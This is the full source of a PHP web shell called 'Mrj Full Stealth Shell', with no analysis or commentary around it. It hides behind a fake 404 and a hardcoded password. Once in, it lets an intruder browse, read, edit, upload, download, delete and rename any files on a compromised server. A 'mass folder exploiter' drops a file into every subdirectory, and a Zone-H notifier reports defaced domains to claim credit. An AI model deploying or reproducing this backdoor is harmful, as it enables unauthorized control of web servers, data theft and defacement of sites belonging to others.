mrj
<?php
error_reporting(0);
set_time_limit(0);
session_start();
if (isset($_GET['logout'])) {
session_destroy();
header("Location: ?access=mrj");
exit;
}
if (!isset($_GET['access']) || $_GET['access'] !== 'mrj') {
http_response_code(404);
exit;
}
if (!isset($_SESSION['authenticated'])) {
if (isset($_POST['pass']) && $_POST['pass'] === 'Mrj') {
$_SESSION['authenticated'] = true;
} else {
echo '<form method="post"><input type="password" name="pass" placeholder="Password"><input type="submit" value="Login"></form>';
exit;
}
}
$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();
// ==== File Manager Logic ====
if (isset($_GET['del'])) {
$target = $cwd . DIRECTORY_SEPARATOR . $_GET['del'];
if ((is_file($target) && unlink($target)) || (is_dir($target) && rmdir($target))) {
echo "Deleted ✅: " . htmlspecialchars($target) . "<br>";
} else {
echo "Failed ❌ to delete: " . htmlspecialchars($target) . "<br>";
}
}
if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
$from = $cwd . DIRECTORY_SEPARATOR . $_POST['rename_from'];
$to = $cwd . DIRECTORY_SEPARATOR . $_POST['rename_to'];
if (file_exists($from)) {
if (rename($from, $to)) {
echo "Renamed ✅: " . htmlspecialchars($from) . " ➔ " . htmlspecialchars($to) . "<br>";
} else {
echo "Failed ❌ to rename: " . htmlspecialchars($from) . "<br>";
}
}
}
if (isset($_POST['createfile'])) {
$newfile = $cwd . DIRECTORY_SEPARATOR . $_POST['newfilename'];
if (file_put_contents($newfile, $_POST['newfilecontent']) !== false) {
echo "Created ✅: " . htmlspecialchars($newfile) . "<br>";
} else {
echo "Failed ❌ to create file: " . htmlspecialchars($newfile) . "<br>";
}
}
if (isset($_POST['savefile'])) {
$savefile = $cwd . DIRECTORY_SEPARATOR . $_POST['filename'];
if (file_put_contents($savefile, $_POST['filecontent']) !== false) {
echo "Saved ✅: " . htmlspecialchars($savefile) . "<br>";
} else {
echo "Failed ❌ to save file: " . htmlspecialchars($savefile) . "<br>";
}
}
if (isset($_GET['edit'])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET['edit'];
if (is_file($file)) {
echo '<h3>Editing: ' . htmlspecialchars($file) . '</h3>';
echo '<form method="post">
<textarea name="filecontent" rows="20" cols="100">' . htmlspecialchars(file_get_contents($file)) . '</textarea><br>
<input type="hidden" name="filename" value="' . htmlspecialchars($_GET['edit']) . '">
<input type="submit" name="savefile" value="Save">
</form>';
}
exit;
}
if (isset($_GET['view'])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET['view'];
if (is_file($file)) {
echo '<pre>' . htmlspecialchars(file_get_contents($file)) . '</pre>';
}
exit;
}
if (isset($_GET['download'])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET['download'];
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: ' . mime_content_type($file));
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file);
exit;
} else {
echo "Download Failed ❌: File not found.<br>";
}
}
if (isset($_FILES['uploadfile'])) {
$destination = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['uploadfile']['name']);
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $destination)) {
echo "Uploaded ✅: " . htmlspecialchars($destination) . "<br>";
} else {
echo "Upload Failed ❌: " . htmlspecialchars($_FILES['uploadfile']['name']) . "<br>";
}
}
if (isset($_POST['massexploit'])) {
$filename = trim($_POST['massfilename']);
$targetPath = rtrim(trim($_POST['masspath']), "/\\");
$content = $_POST['masscontent'];
if (is_dir($targetPath)) {
$subdirs = scandir($targetPath);
foreach ($subdirs as $sub) {
if ($sub == '.' || $sub == '..') continue;
$fullsub = $targetPath . DIRECTORY_SEPARATOR . $sub;
if (is_dir($fullsub)) {
$filePath = $fullsub . DIRECTORY_SEPARATOR . $filename;
if (file_put_contents($filePath, $content) !== false) {
echo "Exploited ✅ " . $filePath . "<br>";
} else {
echo "Failed ❌ " . $filePath . "<br>";
}
}
}
} else {
echo "<b>Invalid target directory!</b><br>";
}
}
// ==== ZONE-H Notifier ====
if (isset($_POST['zonenow'])) {
$defacer = $_POST['defacer'];
echo "<br><font color='red'>Archive</font> : <a href='http://zone-h.org/archive/notifier=$defacer' target='_blank'>http://zone-h.org/archive/notifier=$defacer</a>";
echo "<br><font color='red'>OnHold</font> : <a href='http://zone-h.org/archive/notifier=$defacer&published=0' target='_blank'>http://zone-h.org/archive/notifier=$defacer&published=0</a>";
foreach(explode("\n", htmlspecialchars($_POST['domains'])) as $domain) {
postzone(trim($domain), $_POST['defacer']);
}
echo "<br>";
}
function postzone($url, $defacer) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, "http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&hackmode=1&reason=1");
$res = curl_exec ($ch);
if (preg_match ("/color=\"red\">OK<\/font><\/li>/", $res)) {
echo "<br><font color='red'>Zone</font><font color='#fff'>-H</font> --> <font color='gold'>$url</font> : <span style='color:green'>SUCCESS</span>";
} else {
echo "<br><font color='red'>Zone</font><font color='#fff'>-H</font> --> <font color='gold'>$url</font> : <span style='color:red'>FAILED</span>";
}
curl_close($ch);
}
?>
<!-- ==== STYLES ==== -->
<style>
body {
font-family: monospace;
background: #111;
color: #ddd;
margin: 0;
padding: 0;
}
a {
color: #0bf;
}
table {
border-collapse: collapse;
width: 100%;
}
td, th {
padding: 5px;
}
input[type=text], textarea {
background: #222;
color: #0f0;
border: 1px solid #555;
padding: 5px;
font-size: 14px;
width: 100%;
box-sizing: border-box;
}
input[type=submit], input[type=file] {
padding: 5px 10px;
background: #333;
color: white;
border: 1px solid #666;
cursor: pointer;
margin-top: 5px;
}
input[type=submit]:hover {
background: #555;
}
textarea {
resize: vertical;
}
.header {
padding: 10px;
background: #222;
position: relative;
}
.logout {
position: absolute;
top: 10px;
right: 10px;
}
.container {
display: flex;
justify-content: space-between;
gap: 20px;
margin: 20px;
}
.leftbox, .rightbox {
width: 48%;
background: #1a1a1a;
padding: 15px;
border: 1px solid #333;
border-radius: 8px;
}
form {
margin-bottom: 15px;
}
.active-folder {
background: #ff0;
color: #000;
font-weight: bold;
}
</style>
<!-- ==== HTML UI ==== -->
<div class="header">
<h2>Mrj Full Stealth Shell</h2>
<div class="logout">
<form method="get">
<input type="hidden" name="access" value="mrj">
<input type="hidden" name="logout" value="1">
<input type="submit" value="Logout">
</form>
</div>
</div>
<form method="get" style="margin:10px;">
<input type="hidden" name="access" value="mrj">
<input type="text" name="path" value="<?=htmlspecialchars($cwd)?>" size="80">
<input type="submit" value="GO">
</form>
<form method="post" style="margin:10px;">
<b>Make File:</b>
<div style="display:flex; gap:10px; margin-top:5px;">
<textarea name="newfilecontent" rows="1" placeholder="File content" style="flex:1;"></textarea>
<input type="text" name="newfilename" placeholder="Filename.php" style="width:200px;">
<input type="submit" name="createfile" value="Create">
</div>
</form>
<a href="?access=mrj&path=<?=urlencode(dirname($cwd))?>">[Parent Directory]</a><br><br>
<table border="1"><tr><th>Name</th><th>Type</th><th>Size</th><th>Actions</th></tr>
<?php
$allItems = scandir($cwd);
$dirs = $files = [];
foreach ($allItems as $file) {
if ($file == '.' || $file == '..') continue;
$fullpath = $cwd . DIRECTORY_SEPARATOR . $file;
if (is_dir($fullpath)) $dirs[] = $file; else $files[] = $file;
}
foreach (array_merge($dirs, $files) as $file) {
$fullpath = $cwd . DIRECTORY_SEPARATOR . $file;
$isDir = is_dir($fullpath);
$highlight = ($isDir && realpath($fullpath) == realpath($cwd)) ? 'class="active-folder"' : '';
echo '<tr><td '.$highlight.'>';
echo $isDir ? "<a href='?access=mrj&path=".urlencode($fullpath)."'>".htmlspecialchars($file)."</a>" : htmlspecialchars($file);
echo "</td><td>".($isDir ? "DIR" : "FILE")."</td><td>".($isDir ? "-" : filesize($fullpath))."</td><td>";
if (!$isDir) {
echo "<a href='?access=mrj&path=".urlencode($cwd)."&view=".urlencode($file)."'>View</a> | ";
echo "<a href='?access=mrj&path=".urlencode($cwd)."&edit=".urlencode($file)."'>Edit</a> | ";
echo "<a href='?access=mrj&path=".urlencode($cwd)."&download=".urlencode($file)."'>Download</a> | ";
}
echo "<a href='?access=mrj&path=".urlencode($cwd)."&del=".urlencode($file)."' onclick='return confirm(\"Delete?\")'>Delete</a> | ";
echo "<form method='post' style='display:inline'>
<input type='hidden' name='rename_from' value='".htmlspecialchars($file)."'>
<input type='text' name='rename_to' value='".htmlspecialchars($file)."' size='10'>
<input type='submit' value='Rename'></form></td></tr>";
}
?>
</table>
<!-- ==== Mass Dropper + Zone-H Notifier ==== -->
<div class="container">
<div class="leftbox">
<form method="post" enctype="multipart/form-data">
<input type="file" name="uploadfile"><br>
<input type="submit" value="Upload File">
</form>
<form method="post">
<b>Mass Folder Exploiter:</b><br><br>
<label>Filename:</label>
<input type="text" name="massfilename" value="mrj.txt"><br><br>
<label>Path / Directory:</label>
<input type="text" name="masspath" placeholder="/home/public_html/"><br><br>
<label>File Content:</label>
<textarea name="masscontent" rows="5" placeholder="Mass file content"></textarea><br><br>
<input type="submit" name="massexploit" value="Submit">
</form>
</div>
<div class="rightbox">
<form method="post">
<b>Zone H Notifier:</b><br><br>
<label>Defacer Name:</label>
<input type="text" name="defacer" value="Mrj Haxcore"><br><br>
<label>Defaced URLs:</label>
<textarea name="domains" rows="5" placeholder="http://target.com/def.htm http://target.com/def.txt"></textarea><br><br>
<input type="submit" name="zonenow" value="Notify">
</form>
</div>
</div>
